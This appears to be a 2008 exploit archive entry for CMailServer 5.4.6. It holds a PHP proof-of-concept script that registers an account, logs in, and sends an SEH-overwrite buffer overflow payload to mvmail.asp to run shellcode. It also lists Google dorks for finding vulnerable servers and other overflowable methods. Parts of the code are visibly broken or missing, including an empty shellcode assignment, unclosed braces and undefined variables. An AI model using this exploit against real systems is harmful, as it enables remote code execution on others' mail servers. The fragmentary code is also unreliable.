Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)







        CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite
	proof of concept exploit

        by Nine:Situations:Group::bruiser

        our site:

        software site:

        Google dorks:
        intitle:"Mail Server CMailServer WebMail"
        intitle:"Mail Server CMailServer WebMail 5.4.6"

        Some notes:
        This server provides a IIS/webmail interface and a registered component
	vulnerable to multiple buffer overflows, among the others, the
	CMailCom.POP3 class with CLSID 6971D9B8-B53E-4C25-A414-76199768A592.
        This class is called by various ASP scripts inside the main folder...
	I found this clear vector, look mwmail.asp , lines 25-35:

	  Set objPOP3 = CreateObject("CMailCOM.POP3.1")
          objPOP3.Login Session("User"), Session("Pass")
          Session("LoginSuccess") = objPOP3.LoginSuccess
          If Session("LoginSuccess") = 1 Then
	  set rs=Server.createobject("adodb.recordset") "mailfolder",Conn,1,3
	    i = 0
	    arrString = Split(Request("indexOfMail"), ";", -1, 1)
	    While Len(arrString(i)) <> 0
	        strUID = arrString(i)
	        objPOP3.MoveToFolder strUID ' <---------------- bof

	By attaching olly to the w3wp.exe sub-process you will see the usual
	dump with ecx and eip owned, with a buffer of approxymately 13000 chars.

        Exploitation is post-auth but you can have a user account by simply
	browsing the signup.asp page, enabled by default.
        Calc.exe will run with NETWORK SERVICE privilege, check tasks. Note
	that 4-5 failed exploit attempts may result in IIS "Service
	Unavailiable" message.

        Other attacks are possible, see a list of locally overflowable
        CreateUserPath, Logout, DeleteMailByUID, MoveToInbox, MoveToFolder,
	DeleteMailEx,  GetMailDataEx, SetReplySign, SetForwardSign, SetReadSign.
	Note also that remotely there's some kind of validation (ex. you can
	not have a username with a length of more than 4000 chars which
	could be used instead to overflow the CreateUserPath method and
	you cannot overflow ex. through the strUID argument) which reduces a lot
	the remote vectors. However, as you can see there's no filter on
	"indexOfMail" one.

        Other notes:
        CMailCOM.SMTP class with CLSID 0609792F-AB56-4CB6-8909-19CDF72CB2A0
	is also vulnerable in the following methods:
        AddAttach, SetSubject, SetBcc, SetBody, SetCc, SetFrom,
        SetTo, SetFromUID

        $argv[3] ? $port = (int) $argv[3] : $port = 80;
        print ("CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite\n".
               "by Nine:Situations:Group::bookoo\n");
        $argv[2] ? print("attackin'...\n") : die ("syntax:  php ".$argv[0]." [host] [path] [[port]]\n".
	                                          "example: php ".$argv[0]." /mail/    \n".
	                                          "   ''    php ".$argv[0]." / 81      \n");
        $url = "http://$host:$port";
        $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
        $win ? dl("php_curl.dll") : dl("");

        //borrowed from bookoo
        function send($packet,$out)  {

            global $url, $data;

	    if (!extension_loaded("curl"){
		    die("you need the curl extesion loaded to run...");
	    $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL,$url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_setopt($ch, CURLOPT_HEADER, 1);
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $packet);
            $data = curl_exec($ch); if (curl_errno($ch)) {
                print curl_error($ch)."\n";
            } else {
            if ($out) print($data."\n");

        $agent="Mozilla/5.0 (Windows; U; Windows NT 5.2; it; rv: Gecko/20080623 Firefox/";
        $usr="bookoo";$pwd="password";//new usr username & password, change
	$d ="Signup=1&Account=$usr&Pass=$pwd&RePass=$pwd&UserName=&Comment=User&";
        $h ="POST ".$path."signup.asp HTTP/1.0\r\nHost: $host\r\nUser-Agent: $agent\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($d)."\r\nConnection: Close\r\n\r\n$d";
	$tmp=explode("Set-Cookie: ",$data);
	for ($i=1; $i<count($tmp);$i++){ $tmpi=explode(" ",$tmp[$i]);$sess=$tmpi[0];$pos=strpos($sess, "ASPSESSIONID");	if ($pos === true) break; echo $sess."\n";}
	$d  ="User=$usr&Pass=$pwd&SaveUserPass=on";
        $h ="POST ".$path."login.asp HTTP/1.0\r\nHost: $host\r\nUser-Agent: $agent\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($d)."\r\nCookie: $sess SaveUserPass=1; Pass=$pwd; User=$usr;\r\nConnection: Close\r\n\r\n$d";
        //bad chars: \x3b \x2f
        # win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=Pex
        $shellcode =
	$seh="\xf1\xda\x02\x10"; #0x1002DAF1    cmailcom.dll / pop ecx - pop - ret
	$bof= $nop . $jmp_short. $seh . str_repeat("\x90",24). $shellcode ;
        $h ="POST ".$path."mvmail.asp HTTP/1.0\r\nHost: $host\r\nUser-Agent: $agent\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($d)."\r\nCookie: $sess SaveUserPass=1; Pass=$pwd; User=$usr;\r\nConnection: Close\r\n\r\n$d";

# [2008-07-06]